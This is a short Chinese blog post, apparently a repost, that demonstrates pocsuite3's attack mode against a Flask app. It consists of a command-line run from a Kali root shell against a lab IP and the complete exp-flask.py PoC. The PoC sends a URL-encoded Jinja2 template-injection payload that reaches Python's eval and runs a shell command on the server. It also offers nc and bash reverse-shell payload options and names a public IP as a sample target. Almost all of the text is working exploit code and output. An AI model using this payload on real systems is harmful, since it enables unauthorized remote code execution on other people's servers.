pocsuite-攻击模式
作者:互联网
1、命令行
root@kali:~/code# pocsuite -r exp-flask.py -u http://192.168.142.132:8000 --attack
,------. ,--. ,--. ,----. {1.8.5-nongit-20211111}
| .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. |
| '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' <
| | --'' '-' \ `--.-' `' '' | | | | \ --/'-' |
`--' `---' `---`----' `----'`--' `--' `----`----' http://pocsuite.org
[*] starting at 15:50:14
[15:50:14] [INFO] loading PoC script 'exp-flask.py'
[15:50:14] [INFO] pocsusite got a total of 1 tasks
[15:50:14] [INFO] running poc:'flack' target 'http://192.168.142.132:8000'
Hello name= www-data
[15:50:14] [+] URL : http://192.168.142.132:8000?name=
[15:50:14] [+] Name : name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
[15:50:14] [INFO] Scan completed,ready to print
+-----------------------------+----------+--------+-----------+---------+---------+
| target-url | poc-name | poc-id | component | version | status |
+-----------------------------+----------+--------+-----------+---------+---------+
| http://192.168.142.132:8000 | flack | 1.1 | flask | flask | success |
+-----------------------------+----------+--------+-----------+---------+---------+
success : 1 / 1
[*] shutting down at 15:50:14
root@kali:~/code#
exp-flask.py
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY
class DemoPOC(POCBase):
vulID = '1.1'
version = '1.1'
author = ['1.1']
vulDate = '1.1'
createDate = '1.1'
updateDate = '1.1'
references = ['1.1']
name = 'flack'
appPowerLink = 'flack'
appName = 'flask'
appVersion = 'flask'
vulType = VUL_TYPE.CODE_EXECUTION
desc = '''
'''
samples = ['96.234.71.117:80']
category = POC_CATEGORY.EXPLOITS.REMOTE
def _options(self):
o = OrderedDict()
payload = {
"nc": REVERSE_PAYLOAD.NC,
"bash": REVERSE_PAYLOAD.BASH,
}
o["command"] = OptDict(selected="bash", default=payload)
return o
def _verify(self):
output = Output(self)
result = {}
# 攻击代码
def trim(str):
newstr = ''
for ch in str: #遍历每一个字符串
if ch!=' ':
newstr = newstr+ch
return newstr
def _attack(self):
result = {}
path = "?name="
url = self.url + path
#print(url)
cmd = self.get_option("command")
payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
#print(payload)
try:
resq = requests.get(url + payload)
t = resq.text
t = t.replace('\n', '').replace('\r', '')
print(t)
t = t.replace(" ","")
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Name'] = payload
except Exception as e:
return
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _shell(self):
return
def parse_verify(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPOC)
标签:7D%,攻击,模式,25%,7B%,20%,0A%,pocsuite,result 来源: https://www.cnblogs.com/snow2021/p/15540304.html